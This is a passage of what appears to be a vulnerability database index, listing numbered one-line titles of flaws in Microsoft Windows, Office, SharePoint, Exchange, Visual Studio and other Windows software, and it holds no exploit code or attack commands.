Microsoft Windows NT 4.0/2000/XP/Server 2003 WINS Server GS privilege escalation [508] Microsoft Windows NT 4.0/2000/XP/Server 2003 ASN.1 lsass.exe Integer Coercion Error [491] Microsoft Windows XP .folder memory corruption [441] Microsoft Windows SHELL32.DLL memory corruption [414] Microsoft Windows XP BIOS Date Reset denial of service [383] Microsoft Windows 2000/XP Workstation Service memory corruption [350] Microsoft Windows 2000/NT/Server 2003/XP HTML Help memory corruption [348] Microsoft Windows XP CommCtl32.dll memory corruption [332] Microsoft Windows NT 4.0/2000/XP Messenger Service memory corruption [331] Microsoft Windows 2000/XP RPCSS race condition [328] Microsoft Windows 2000 Message Queuing Service mqsvc.exe memory corruption [323] Microsoft Windows Server 2003 Shell Folder information disclosure [318] Microsoft Windows Media Player 6.4/7/7.1/9 unknown vulnerability [312] Microsoft Windows 2000/Server 2003/Vista/XP PostThreadMessage unknown vulnerability [286] Microsoft Windows Server 2003 Buffer Overflow Protection unknown vulnerability [278] Microsoft Windows XP ZIP Manager memory corruption [277] Microsoft Windows NT 4.0/2000/XP/Server 2003 RPCSS memory corruption [270] Microsoft Windows XP SP1 TCP Packet unknown vulnerability [269] Microsoft Windows up to 98 SP1 UDP Fragment denial of service [261] Microsoft Windows NT 4.0 NetBIOS information disclosure [249] Microsoft Windows NT 4.0/2000/XP/Server 2003 Blaster/Eske memory corruption [193] Microsoft Windows up to 8.x Media Player unknown vulnerability [179] Microsoft Windows XP desktop.ini memory corruption [178] Microsoft Windows NT 4.0/2000/XP/Server 2003 RPC DCOM PerformScmStage memory corruption [175] Microsoft Windows up to 2000 SP3 SMTP Timestamp denial of service [165] Microsoft Windows NT 4.0/2000/XP SMB memory corruption [164] Microsoft Windows up to XP/Server 2003 HTML Converter memory corruption [158] Microsoft Windows 2000/XP rundll32.exe memory corruption [155] Microsoft Windows up to 2000 SP3 LDAP Cryptnet.DLL denial of service [154] Microsoft Windows up to 2000 SP3 RPC unknown vulnerability [153] Microsoft Windows 2000 Terminal Service unknown vulnerability [151] Microsoft Windows up to 2000 SP3 ModifyDN Request denial of service [150] Microsoft Windows up to 2000 SP3 Domain Controller unknown vulnerability [149] Microsoft Windows up to 2000 SP3 Port Name API memory corruption [146] Microsoft Windows up to 2000 SP3 IMAADPCM cbDestLength memory corruption [145] Microsoft Windows 2000 Active Directory weak authentication [135] Microsoft Windows 2000 API ShellExecute memory corruption [134] Microsoft Windows up to 2000 SP3 Active Directory memory corruption [124] Microsoft Windows 5 Media Service ISAPI Extension /scripts memory corruption [123] Microsoft Windows 9 Media Player privilege escalation [71] Microsoft Windows Media Player unknown vulnerability [69] Microsoft Windows XP Internet Connection Firewall unknown vulnerability [61] Microsoft Windows XP Media Player 7.1 privilege escalation [41] Microsoft Windows Form Input Type denial of service [9] Microsoft Windows riched20.dll memory corruption [8] Microsoft Windows NT 4.0/2000 cmd.exe cd memory corruption [4] Microsoft Windows 2000 NetBIOS denial of service [176821] F5 BIG-IP APM/BIG-IP APM Clients Windows Installer Service permission [176798] F5 BIG-IP APM/BIG-IP APM Clients Windows Installer cachecleaner.dll uncontrolled search path [176770] Apache HTTP Server up to 2.4.46 on Windows denial of service [176667] McAfee Data Loss Prevention on Windows ePO Administrator Extension cross site scripting [176519] Microsoft Malware Protection Engine unknown vulnerability [176516] Microsoft Malware Protection Engine denial of service [176504] Microsoft SharePoint Server 2013 SP1/2016/2019 unknown vulnerability [176503] Microsoft SharePoint Server 2013 SP1/2016/2019 information disclosure [176502] Microsoft SharePoint Server 2013 SP1/2016/2019 unknown vulnerability [176501] Microsoft SharePoint Server 2013 SP1/2016/2019 unknown vulnerability [176489] Microsoft SharePoint Server 2013 SP1/2016/2019 unknown vulnerability [176488] Microsoft Outlook 2013 RT SP1/2013 SP1/2016/2019 unknown vulnerability [176487] Microsoft SharePoint Server 2013 SP1/2016/2019 unknown vulnerability [176481] Microsoft Office 2013 RT SP1/2013 SP1/2016/2019 Graphics unknown vulnerability [176480] Microsoft Office 2013 RT SP1/2013 SP1/2016/2019 Graphics unknown vulnerability [176479] Microsoft Office Excel unknown vulnerability [176478] Microsoft Visual Studio Code Kubernetes Tools unknown vulnerability [176475] Microsoft SharePoint Server 2013 SP1/2016/2019 unknown vulnerability [176350] Cisco WebEx Player on Windows/macOS WRF File memory corruption [176349] Cisco WebEx Player on Windows/macOS WRF File memory corruption [176060] Backdoor.Win32.NerTe.772 Service Port 21 C:\WINDOWS\scanregs.exe improper authentication [176058] Backdoor.Win32.NerTe.772 Service Port 21 C:\WINDOWS\scanregs.exe backdoor [176028] Citrix Workspace App on Windows access control [175481] PuTTY up to 0.74 on Windows Title denial of service [174872] Microsoft Visual Studio up to 2019 Version 16.9 unknown vulnerability [174869] Microsoft Dynamics 365 for Finance and Operations unknown vulnerability [174860] Microsoft SharePoint Server 2013 SP1/2016/2019 information disclosure [174859] Microsoft SharePoint Server 2013 SP1/2016/2019 unknown vulnerability [174858] Microsoft SharePoint Server 2013 SP1/2016/2019 information disclosure [174857] Microsoft Office/Excel information disclosure [174856] Microsoft Office/Excel unknown vulnerability [174855] Microsoft Office unknown vulnerability [174854] Microsoft Office/Excel 365 Apps for Enterprise up to Online Server unknown vulnerability [174853] Microsoft Office/Excel information disclosure [174852] Microsoft Office/Excel unknown vulnerability [174851] Microsoft Office/Word Graphics unknown vulnerability [174850] Microsoft SharePoint Server 2013 SP1/2016/2019 unknown vulnerability [174838] Microsoft Exchange Server 2013 CU23/2016 CU19/2016 CU20/2019 CU8/2019 CU9 unknown vulnerability [174837] Microsoft Exchange Server 2013 CU23/2016 CU19/2016 CU20/2019 CU8/2019 CU9 unknown vulnerability [174836] Microsoft .NET/Visual Studio unknown vulnerability [174834] Microsoft Exchange Server 2013 CU23/2016 CU19/2016 CU20/2019 CU8/2019 CU9 unknown vulnerability [174832] Microsoft Exchange Server 2013 CU23/2016 CU16/2016 CU20/2019 CU8/2019 CU9 unknown vulnerability [174831] Microsoft Visual Studio Code unknown vulnerability [174830] Microsoft Visual Studio Code Remote Containers Extension unknown vulnerability [174829] Microsoft Visual Studio Code unknown vulnerability [174828] Microsoft Lync Server/Skype for Business Server 2013 CU10/2015 CU11 unknown vulnerability [174827] Microsoft Lync/Skype for Business Server 2013 CU10/2015 CU11/2019 CU5 unknown vulnerability [174825] Microsoft SharePoint Server 2013 SP1/2016/2019 unknown vulnerability [174823] Microsoft SharePoint Server 2013 SP1/2016/2019 unknown vulnerability [174822] Microsoft SharePoint Server 2013 SP1/2016/2019 unknown vulnerability [174820] Microsoft Accessibility Insights for Web information disclosure [174540] Dell EMC Integrated System for Microsoft Azure Stack Hub up to 2011 hard-coded credentials [174247] Aviatrix VPN Client up to 2.14.13 on Windows unquoted search path [174028] Apple macOS up to 11.2.3 Windows Server permission [173303] NVIDIA Windows GPU Display Driver R390 on Windows Installer unknown vulnerability [173302] NVIDIA Windows GPU Display Driver on Windows Kernel Driver nvlddmkm.sys null pointer dereference [173301] NVIDIA Windows GPU Display Driver on Windows Kernel Mode Layer nvlddmkm.sys DxgkDdiEscape unknown vulnerability [173271] NVIDIA GPU Display Driver R450/R460 on Windows/Linux Reference denial of service [173251] NVIDIA GPU Display Driver on Windows/Linux Kernel Mode Layer nvlddmkm.sys unknown vulnerability [173176] HEUR.Backdoor.Win32.Generic Service Port 1080 C:\WINDOWS\1314.exe backdoor [172951] Microsoft Azure DevOps Server/Team Foundation Server information disclosure [172871] Microsoft Kubernetes Tools on Visual Studio unknown vulnerability [172870] Microsoft Office 365 Apps for Enterprise up to 2019 Excel unknown vulnerability [172869] Microsoft SharePoint 2010 SP2/2013 SP1/2016/2019 Update denial of service [172868] Microsoft Office Excel unknown vulnerability [172867] Microsoft Outlook memory corruption [172866] Microsoft Word/Office/SharePoint unknown vulnerability [172865] Microsoft Office Excel unknown vulnerability [172863] Microsoft Visual Studio Code unknown vulnerability [172861] Microsoft Azure DevOps Server 2020.0.1 unknown vulnerability [172859] Microsoft Visual Studio Code unknown vulnerability [172858] Microsoft GitHub Pull Requests and Issues Extension on Visual Studio unknown vulnerability [172857] Microsoft Visual Studio Code Remote Development Extension unknown vulnerability [172856] Microsoft Maven for Java Extension on Visual Studio unknown vulnerability [172855] Microsoft Visual Studio Code unknown vulnerability [172854] Microsoft Visual Studio Code unknown vulnerability [172853] Microsoft Exchange Server 2013 CU23/2016 CU20/2019 CU9 unknown vulnerability [172852] Microsoft Exchange Server 2013 CU23/2016 CU20/2019 CU9 unknown vulnerability [172851] Microsoft Exchange Server 2013 CU23/2016 CU20/2019 CU9 unknown vulnerability [172850] Microsoft Exchange Server 2013 CU23/2016 CU20/2019 CU9 unknown vulnerability [172844] Microsoft Visual Studio Code unknown vulnerability [172739] Zoom Chat up to 2021-04-09 on Windows/macOS unknown vulnerability [172680] Dolby Audio X2 API on Windows unknown vulnerability [172627] Cisco Advanced Malware Protection/Immunet on Windows DLL Loader uncontrolled search path [172514] MongoDB Compass up to 1.2.x/1.24.x on Windows privileges management [171498] PostgreSQL 11.0/11.1/11.2 Windows Installer access control [171497] PostgreSQL 11.0/11.1/11.2 Windows Installer access control [171261] SSH Tectia Client up to 6.4.18 on Windows ConnectSecure privileges management [171260] SSH Tectia Client up to 6.4.18 on Windows ConnectSecure privileges management [171259] SSH Tectia Client up to 6.4.18 on Windows ConnectSecure entropy [170987] Microsoft Visual Studio Code unknown vulnerability [170986] Microsoft Visual Studio Code Java Extension Pack unknown vulnerability [170985] Microsoft Visual Studio Code ESLint Extension unknown vulnerability [170982] Microsoft Visual Studio Code Remote Containers Extension unknown vulnerability [170974] Microsoft SharePoint Server/Office Web Apps 2010 SP2/2013 SP1/2016/2019 unknown vulnerability [170973] Microsoft SharePoint Server/Office Web Apps 2016/2019 information disclosure [170972] Microsoft Office 365 Apps for Enterprise up to 2019 PowerPoint unknown vulnerability [170971] Microsoft Power BI Report Server 15.0.1103.234/15.0.1104.300 information disclosure [170970] Microsoft Office 2010 SP2/2013 RT SP1/2013 SP1/2016 unknown vulnerability [170969] Microsoft Office 365 Apps for Enterprise up to Web Apps 2013 SP1 unknown vulnerability [170968] Microsoft Office 365 Apps for Enterprise up to 2019 unknown vulnerability [170959] Microsoft Office Excel unknown vulnerability [170958] Microsoft Office Excel unknown vulnerability [170945] Microsoft Visual Studio 2017 Version 15.9/2019 Version 16.9 Git link following [170910] Microsoft Azure Spring Cloud information disclosure [170596] Microsoft Exchange Server 2013 CU23/2016 CU18/2016 CU19/2019 CU7/2019 CU8 unknown vulnerability [170595] Microsoft Exchange Server 2013 CU23/2016 CU18/2016 CU19/2019 CU7/2019 CU8 unknown vulnerability [170594] Microsoft Exchange Server 2013 CU23/2016 CU18/2016 CU19/2019 CU7/2019 CU8 unknown vulnerability [170593] Microsoft Exchange Server 2013 CU23/2016 CU18/2016 CU19/2019 CU7/2019 CU8 unknown vulnerability [170592] Microsoft Exchange Server 2013 CU23/2016 CU18/2016 CU19/2019 CU7/2019 CU8 unknown vulnerability [170591] Microsoft Exchange Server 2013 CU23/2016 CU18/2016 CU19/2019 CU7/2019 CU8 unknown vulnerability [170590] Microsoft Exchange Server 2013 CU23/2016 CU18/2016 CU19/2019 CU7/2019 CU8 unknown vulnerability [170102] Cisco AnyConnect Secure Mobility Client on Windows Interprocess Communication uncontrolled search path [169953] Nagios XI 5.7.5 HTTP Request windowswmi.inc.php os command injection [169911] F5 BIG-IP APM Client Troubleshooting Utility up to 7.1.8.4/7.1.9.7/7.2.1.0 on Windows Edge Client untrusted search path [169508] Microsoft Visual Studio Code npm-script Extension unknown vulnerability [169507] Microsoft Visual Studio up to 2017 15.9/2019 16.8 unknown vulnerability [169504] Microsoft Lync Server/Skype for Business Server denial of service [169503] Microsoft Lync Server/Skype for Business Server unknown vulnerability [169496] Microsoft Teams on iOS information disclosure [169495] Microsoft SharePoint 2013 SP1/2016/2019 unknown vulnerability [169494] Microsoft SharePoint 2010 SP2/2013 SP1/2016/2019 unknown vulnerability [169493] Microsoft SharePoint 2010 SP2/2013 SP1/2016/2019 unknown vulnerability [169492] Microsoft SharePoint 2010 SP2/2013 SP1/2016/2019 information disclosure [169491] Microsoft Office unknown vulnerability [169490] Microsoft Office unknown vulnerability [169489] Microsoft Office unknown vulnerability [169488] Microsoft Office unknown vulnerability [169486] Microsoft Exchange Server 2016 CU18/2019 CU7 unknown vulnerability [169485] Microsoft Exchange Server 2016 CU18/2016 CU19/2019 CU7/2019 CU8 unknown vulnerability [169481] Microsoft Azure Kubernetes Service unknown vulnerability [169478] Microsoft .NET Framework 4.6 up to 4.8 denial of service [169477] Microsoft .NET Core/Visual Studio denial of service [169178] SolarWinds Serv-U up to 15.2.1 on Windows Home Directory permission [169027] Cloudflare WARP on Windows unquoted search path [168806] Apple iCloud up to 11.5 on Windows ImageIO out-of-bounds read [168805] Apple iCloud up to 11.5 on Windows ImageIO out-of-bounds read [168804] Apple iCloud up to 11.5 on Windows ImageIO out-of-bounds read [168803] Apple iCloud up to 11.5 on Windows ImageIO out-of-bounds write [168758] Google Go up to 1.14.13/1.15.6 on Windows Fetch Module command injection [168122] Backdoor.Win32.Whisper.b Service Port 113 C:\Windows\rundll32.exe stack-based overflow [167993] Apache Tomcat up to 7.0.106/8.5.59/9.0.39/10.0.0-M9 on Windows NTFS File System File.getCanonicalPath information disclosure [167778] SAP NetWeaver Master Data Management 7.10/710/750 on Windows information disclosure [167666] Microsoft Visual Studio 2017 Version 15.9/2019 Version 16.8 cross site scripting [167653] Microsoft Word unknown vulnerability [167652] Microsoft Word out-of-bounds write [167650] Microsoft SharePoint Server 2013 SP1/2016/2019 input validation [167649] Microsoft SharePoint Server 2013 SP1/2016/2019 input validation [167648] Microsoft SharePoint Foundation 2010 SP2 unknown vulnerability [167647] Microsoft SharePoint Server 2010 SP2/2013 SP1/2016/2019 unknown vulnerability [167646] Microsoft SharePoint Server 2016/2019 privileges management [167645] Microsoft SharePoint Server 2013 SP/2016/2019 privileges management [167644] Microsoft SQL Server 2012 SP4/2014 SP3/2016 SP2/2017 CU22/2019 CU8 sql injection [167643] Microsoft Office 365 Apps for Enterprise up to 2019 unknown vulnerability [167642] Microsoft Excel unknown vulnerability [167641] Microsoft Excel memory corruption [167627] Microsoft ASP.NET Core/Visual Studio denial of service [167473] Backdoor.Win32.Ketch.b HTTP GET Request c:\Windows\watchb.tmp buffer overflow [167427] Backdoor.Win32.NinjaSpy.c HTTP PUT C:\WINDOWS\cmd.dll buffer overflow [167318] Veritas NetBackup/OpsCenter up to 8.3.0.1 on Windows OpenSSL Library permission [167312] Veritas NetBackup/OpsCenter up to 8.3.0.1 on Windows permission [167311] Veritas CloudPoint on Windows Windows Agent openssl.cnf permission [161959] Apple iCloud up to 11.3 on Windows WebKit Universal cross site scripting [161744] Cisco WebEx Network Recording Player/Webex Player on Windows ARF File memory corruption [161743] Cisco WebEx Network Recording Player/Webex Player on Windows ARF File memory corruption [161742] Cisco WebEx Network Recording Player/Webex Player on Windows ARF File memory corruption [161297] PostgreSQL up to 12 on Windows Installer privilege escalation [160966] Microsoft SQL Server 2017/2019 Reporting Services privilege escalation [160964] Microsoft Visual Studio Code JSON privilege escalation [160953] Microsoft Visual Studio memory corruption [160952] Microsoft Office 2016/2019 on macOS information disclosure [160945] Microsoft Excel up to 2019 memory corruption [160941] Microsoft SharePoint Server 2013 SP1 cross site scripting [160938] Microsoft SharePoint Server 2019 Profile Data privilege escalation [160937] Microsoft SharePoint Server 2013 SP1/2016/2019 cross site scripting [160933] Microsoft SharePoint Server 2010 SP2/2013 SP1/2016/2019 cross site scripting [160931] Microsoft SharePoint Server 2010 SP2/2013 SP1/2016/2019 Profile Data privilege escalation [160929] Microsoft SharePoint Server 2010 SP2/2013 SP1/2016/2019 cross site scripting [160928] Microsoft Office Word privilege escalation [160927] Microsoft Excel up to 2019 memory corruption [160926] Microsoft Office up to 2019 Excel memory corruption [160919] Microsoft SharePoint Server 2013 SP1/2016/2019 cross site scripting [160918] Microsoft SharePoint Server Excel information disclosure [160917] Microsoft Office Word privilege escalation [160916] Microsoft SharePoint Server 2010 SP2/2013 SP1/2016/2019 privilege escalation [160915] Microsoft SharePoint Server 2013 SP1/2016/2019 cross site scripting [160914] Microsoft Office up to 2019 Excel memory corruption [160859] Microsoft Visual Studio privilege escalation [160857] Microsoft Dynamics 365 for Finance/Operations 10.0.11 privilege escalation [160856] Microsoft SharePoint Server 2013 SP1/2016/2019 API information disclosure [160854] Microsoft SharePoint Server 2010 SP2/2013 SP1/2016/2019 Markup information disclosure [160852] Microsoft SharePoint Enterprise Server 2010 SP2/2013 SP1/2016/2019 ASP.Net Web Control privilege escalation [160851] Microsoft SharePoint Server 2010 SP2/2013 SP1/2016/2019 Markup information disclosure [160850] Microsoft SharePoint Server 2010 SP2/2013 SP1/2016/2019 Markup information disclosure [160846] Microsoft SharePoint Server 2010 SP2/2013 SP1/2016/2019 Markup information disclosure [160845] Microsoft SharePoint Server 2010 SP2/2013 SP1/2016/2019 Markup information disclosure [160590] Trend Micro OfficeScan XG SP1 on Windows privilege escalation [160103] Cisco Webex Meetings Desktop App on Windows directory traversal [159979] Microsoft Dynamics 365 for Finance/Operations 10.0.11 privilege escalation [159890] Apple iCloud up to 11.2 on Windows WebKit Page Loading weak authentication [159889] Apple iCloud up to 11.2 on Windows WebKit privilege escalation [159888] Apple iCloud up to 11.2 on Windows WebKit memory corruption [159887] Apple iCloud up to 11.2 on Windows WebKit memory corruption [159886] Apple iCloud up to 11.2 on Windows WebKit Universal cross site scripting [159885] Apple iCloud up to 11.2 on Windows WebKit CSP privilege escalation [159884] Apple iCloud up to 11.2 on Windows WebKit memory corruption [159883] Apple iCloud up to 11.2 on Windows ImageIO Integer Coercion Error [159882] Apple iCloud up to 11.2 on Windows ImageIO memory corruption [159881] Apple iCloud up to 11.2 on Windows ImageIO memory corruption [159880] Apple iCloud up to 11.2 on Windows ImageIO memory corruption [159879] Apple iCloud up to 11.2 on Windows ImageIO memory corruption [159878] Apple iCloud up to 11.2 on Windows ImageIO memory corruption [159877] Apple iCloud up to 11.2 on Windows ImageIO memory corruption [159876] Apple iCloud up to 11.2 on Windows ImageIO memory corruption [159875] Apple iCloud up to 11.2 on Windows ImageIO memory corruption [159874] Apple iCloud up to 11.2 on Windows ImageIO memory corruption [159873] Apple iCloud up to 11.2 on Windows ImageIO memory corruption [159872] Apple iCloud up to 11.2 on Windows ImageIO memory corruption [159870] Apple iCloud up to 7.19 on Windows WebKit Page Loading weak authentication [159869] Apple iCloud up to 7.19 on Windows WebKit privilege escalation [159868] Apple iCloud up to 7.19 on Windows WebKit memory corruption [159867] Apple iCloud up to 7.19 on Windows WebKit memory corruption [159866] Apple iCloud up to 7.19 on Windows WebKit Universal cross site scripting [159865] Apple iCloud up to 7.19 on Windows WebKit CSP privilege escalation [159864] Apple iCloud up to 7.19 on Windows WebKit memory corruption [159863] Apple iCloud up to 7.19 on Windows ImageIO Integer Coercion Error [159862] Apple iCloud up to 7.19 on Windows ImageIO memory corruption [159861] Apple iCloud up to 7.19 on Windows ImageIO memory corruption [159860] Apple iCloud up to 7.19 on Windows ImageIO memory corruption [159859] Apple iCloud up to 7.19 on Windows ImageIO memory corruption [159858] Apple iCloud up to 7.19 on Windows ImageIO memory corruption [159857] Apple iCloud up to 7.19 on Windows ImageIO memory corruption [159856] Apple iCloud up to 7.19 on Windows ImageIO memory corruption [159855] Apple iCloud up to 7.19 on Windows ImageIO memory corruption [159854] Apple iCloud up to 7.19 on Windows ImageIO memory corruption [159853] Apple iCloud up to 7.19 on Windows ImageIO memory corruption [159852] Apple iCloud up to 7.19 on Windows ImageIO memory corruption [159613] Microsoft SQL Server Management Studio 18.6 privilege escalation [159611] Microsoft SharePoint Enterprise Server/SharePoint Server privilege escalation [159609] Microsoft SharePoint Foundation cross site scripting [159607] Microsoft Visual Studio Code Environment Variable privilege escalation [159606] Microsoft Excel up to 2019 memory corruption [159602] Microsoft SharePoint Foundation privilege escalation [159599] Microsoft Excel up to 2019 information disclosure [159598] Microsoft Office 365 Apps for Enterprise/2013 C2R/2019 privilege escalation [159596] Microsoft Excel 2010 SP2 memory corruption [159586] Microsoft SharePoint Foundation privilege escalation [159578] Microsoft Outlook up to 2019 information disclosure [159577] Microsoft Word 365 Apps for Enterprise/2019 information disclosure [159576] Microsoft Excel memory corruption [159575] Microsoft SharePoint Foundation information disclosure [159569] Microsoft Word up to 2019 information disclosure [159565] Microsoft SharePoint Foundation Office cross site scripting [159549] Microsoft Word up to 2019 information disclosure [159547] Microsoft Excel up to 2019 memory corruption [159544] Microsoft Excel up to 2019 memory corruption [159538] Microsoft Office memory corruption [159533] Microsoft Access memory corruption [159514] Microsoft .NET Framework up to 4.8 Cache File privilege escalation [159510] Microsoft .NET Framework 2.0 SP2/3.5/3.5.1/4.7.2/4.8 privilege escalation [159498] Microsoft Office/Outlook/365 Apps for Enterprise memory corruption [159000] Citrix Workspace App 1912 CU1/2006.1 on Windows Automatic Updater Service privilege escalation [157967] Microsoft Visual Studio Code ESLint Extension privilege escalation [157965] Microsoft Lync/Skype for Business Server/SharePoint OAuth Token privilege escalation [157912] Microsoft SharePoint 2010 SP2/2013 SP1/2016/2019 cross site scripting [157911] Microsoft SharePoint 2013 SP1/2016/2019 Email Parser privilege escalation [157910] Microsoft SharePoint 2010 SP2/2013 SP1/2016/2019 cross site scripting [157909] Microsoft SharePoint 2013 SP1/2016/2019 privilege escalation [157908] Microsoft Office/SharePoint information disclosure [157907] Microsoft SharePoint 2016/2019 cross site scripting [157906] Microsoft SharePoint 2010 SP2/2013 SP1/2016/2019 Office cross site scripting [157905] Microsoft Office/SharePoint Word memory corruption [157904] Microsoft Office/SharePoint Word memory corruption [157903] Microsoft Office/Project Markup File Origin Validation Error [157902] Microsoft Office Online Server/Office Web Apps cross site scripting [157899] Microsoft SharePoint 2010 SP2/2013 SP1/2016/2019 PerformancePoint Services privilege escalation [157898] Microsoft Outlook up to 2019 memory corruption [157897] Microsoft Office/SharePoint Word memory corruption [157896] Microsoft Office/SharePoint information disclosure [157877] Microsoft Azure DevOps Server 2019 Update 1/2019 Update 1.1/2019.0.1 cross site scripting [156389] Microsoft Visual Studio Code Live Share Extension information disclosure [156338] Microsoft SharePoint Foundation cross site scripting [156337] Microsoft SharePoint Foundation cross site scripting [156336] Microsoft SharePoint Foundation privilege escalation [156335] Microsoft SharePoint Foundation cross site scripting [156334] Microsoft SharePoint Foundation Redirect [156333] Microsoft SharePoint Foundation cross site scripting [156332] Microsoft SharePoint Foundation privilege escalation [156331] Microsoft SharePoint Foundation cross site scripting [156330] Microsoft SharePoint Foundation cross site scripting [156329] Microsoft SharePoint Foundation cross site scripting [156328] Microsoft SharePoint Foundation ASP.Net Web Control privilege escalation [156327] Microsoft SharePoint Foundation 2010 SP2 cross site scripting [156326] Microsoft Project information disclosure [156325] Microsoft Office memory corruption [156324] Microsoft Office up to 2019 for Mac Outlook information disclosure [156323] Microsoft Excel up to 2019 for Mac memory corruption [156322] Microsoft Excel up to 2019 for Mac memory corruption [156299] Microsoft Azure DevOps Server 2019 Update 1/2019 Update 1.1 privilege escalation [156298] Microsoft Bing Search on Android weak authentication [156297] Microsoft Word on Android privilege escalation [155805] Apple iCloud up to 7.18/11.1 on Windows WebKit memory corruption [155804] Apple iCloud up to 7.18/11.1 on Windows WebKit cross site scripting [155803] Apple iCloud up to 7.18/11.1 on Windows WebKit privilege escalation [155802] Apple iCloud up to 7.18/11.1 on Windows WebKit memory corruption [155801] Apple iCloud up to 7.18/11.1 on Windows WebKit memory corruption [155800] Apple iCloud up to 7.18/11.1 on Windows WebKit privilege escalation [155799] Apple iCloud up to 7.18/11.1 on Windows WebKit Universal cross site scripting [155798] Apple iCloud up to 7.18/11.1 on Windows WebKit privilege escalation [155796] Apple iCloud up to 7.18/11.1 on Windows ImageIO information disclosure [155795] Apple iCloud up to 7.18/11.1 on Windows ImageIO memory corruption [155794] Apple iCloud up to 7.18/11.1 on Windows ImageIO memory corruption [155164] Microsoft Power BI Report Server privilege escalation [155163] Microsoft Visual Studio Code Python Extension privilege escalation [155159] Microsoft Visual Studio/ASP.NET Core privilege escalation [155125] Microsoft .NET Core/.NET Framework denial of service [155124] Microsoft SharePoint Enterprise Server 2013 SP1/2016/2019 cross site scripting [155123] Microsoft SharePoint Enterprise Server 2013 SP1/2016/2019 cross site scripting [155122] Microsoft SharePoint Enterprise Server 2013 SP1/2016 cross site scripting [155121] Microsoft SharePoint Enterprise Server 2013 SP1/2016/2019 cross site scripting [155120] Microsoft SharePoint Enterprise Server 2013 SP1/2016/2019 cross site scripting [155119] Microsoft SharePoint Enterprise Server 2010 SP2/2013 SP1/2016/2019 cross site scripting [155118] Microsoft SharePoint Enterprise Server 2016/2019 cross site scripting [155098] Microsoft .NET Framework 3.0 SP2/3.5.1 privilege escalation [155083] Microsoft Excel memory corruption [155082] Microsoft SharePoint Enterprise Server 2013 SP1/2016/2019 information disclosure [155081] Microsoft Visual Studio Code Python Extension privilege escalation [155070] Microsoft SharePoint Enterprise Server 2016/2019 Source Markup privilege escalation [155069] Microsoft SharePoint Enterprise Server 2013 SP1/2016/2019 ASP.Net Web Control memory corruption [155068] Microsoft SharePoint Enterprise Server 2013 SP1/2016/2019 Source Markup privilege escalation [155067] Microsoft SharePoint Enterprise Server 2013 SP1/2016/2019 Source Markup privilege escalation [155040] F5 BIG-IP Edge Client 7.1.5/7.1.6/7.1.7/7.1.8/7.1.9 on Windows ActiveX Component memory corruption [154622] Handy Groupware 1.7.3.1 on Windows ActiveX Control HShell.dll ShellExec privilege escalation [154327] HPE Onboard Administrator 4.95 on Linux/Windows Reflected cross site scripting [154022] Aviatrix OpenVPN Client up to 2.5.7 on Linux/macOS/Windows OpenSSL Parameter privilege escalation [153744] Intel PROSet/Wireless WiFi up to 21.69 on Windows 10 Kernel Mode Driver memory corruption [153285] Microsoft Research JavaScript Cryptography Library 1.4 ECC Incorrect Calculation [153271] Microsoft Forefront Endpoint Protection MpSigStub.exe privilege escalation [153262] Microsoft Office 365 ProPlus/2010 SP2/2013 RT SP1/2013 SP1/2016 memory corruption [153254] Microsoft Office/SharePoint/Word 2010 SP2/2013 RT SP1/2013 SP1/2016/2019 memory corruption [153253] Microsoft Office 365 ProPlus Excel memory corruption [153252] Microsoft SharePoint Enterprise Server cross site scripting [153251] Microsoft SharePoint Enterprise Server privilege escalation [153250] Microsoft privilege escalation [153249] Microsoft SharePoint Enterprise Server privilege escalation [153248] Microsoft SharePoint Enterprise Server cross site scripting [153247] Microsoft SharePoint Enterprise Server privilege escalation [153246] Microsoft SharePoint Enterprise Server Application Package privilege escalation [153242] Microsoft Office up to 2019 Access Connectivity Engine memory corruption [153238] Microsoft SharePoint Enterprise Server cross site scripting [153222] Microsoft SharePoint Enterprise Server cross site scripting [153221] Microsoft SharePoint Enterprise Server cross site scripting [153220] Microsoft SharePoint Enterprise Server cross site scripting [153219] Microsoft SharePoint Enterprise Server cross site scripting [153218] Microsoft SharePoint Enterprise Server cross site scripting [153217] Microsoft SharePoint Enterprise Server cross site scripting [153216] Microsoft SharePoint Enterprise Server Source Markup privilege escalation [153211] Microsoft Office/Excel/Office 365 memory corruption [153210] Microsoft Visual Studio up to 2019 Version 16.5 Extension Installer Service privilege escalation [153209] Microsoft Visual Studio 2017 15.9/2019 16.0/2019 16.4/2019 16.5 Updater Service privilege escalation [153194] Microsoft Office 2010 SP2/2013 RT SP1/2013 SP1/2016/2019 privilege escalation [153192] Microsoft SharePoint Enterprise Server/SharePoint Server Application Package privilege escalation [153186] Microsoft SharePoint Enterprise Server/SharePoint Server cross site scripting [153179] Microsoft SharePoint Enterprise Server Application Package privilege escalation [153178] Microsoft SharePoint Enterprise Server Application Package privilege escalation [153177] Microsoft SharePoint Enterprise Server Application Package privilege escalation [152629] Apple iCloud up to 7.17 on Windows WebKit Page Loading Incorrect Control Flow [152628] Apple iCloud up to 7.17 on Windows WebKit cross site scripting [152627] Apple iCloud up to 7.17 on Windows WebKit denial of service [152626] Apple iCloud up to 7.17 on Windows WebKit privilege escalation [152625] Apple iCloud up to 7.17 on Windows WebKit memory corruption [152624] Apple iCloud up to 7.17 on Windows WebKit race condition [152623] Apple iCloud up to 7.17 on Windows WebKit memory corruption [152622] Apple iCloud up to 7.17 on Windows WebKit memory corruption [152621] Apple iCloud up to 7.17 on Windows WebKit privilege escalation [152620] Apple iCloud up to 7.17 on Windows WebKit privilege escalation [152619] Apple iCloud up to 7.17 on Windows libxml2 memory corruption [152618] Apple iCloud up to 7.17 on Windows libxml2 memory corruption [152617] Apple iCloud up to 7.17 on Windows libxml2 memory corruption [152616] Apple iCloud up to 10.9.2 on Windows WebKit Page Loading Incorrect Control Flow [152615] Apple iCloud up to 10.9.2 on Windows WebKit cross site scripting [152614] Apple iCloud up to 10.9.2 on Windows WebKit denial of service [152613] Apple iCloud up to 10.9.2 on Windows WebKit memory corruption [152612] Apple iCloud up to 10.9.2 on Windows WebKit privilege escalation [152611] Apple iCloud up to 10.9.2 on Windows WebKit race condition [152610] Apple iCloud up to 10.9.2 on Windows WebKit memory corruption [152609] Apple iCloud up to 10.9.2 on Windows WebKit memory corruption [152608] Apple iCloud up to 10.9.2 on Windows WebKit privilege escalation [152607] Apple iCloud up to 10.9.2 on Windows WebKit privilege escalation [152606] Apple iCloud up to 10.9.2 on Windows libxml2 memory corruption [152605] Apple iCloud up to 10.9.2 on Windows libxml2 memory corruption [152604] Apple iCloud up to 10.9.2 on Windows libxml2 memory corruption [152283] Serendipity up to 2.3.3 on Windows privilege escalation [151931] signotec signoPAD-API-Web up to 3.1.0 on Windows WebSocket privilege escalation [151173] Microsoft Exchange Server 2016 CU14/2016 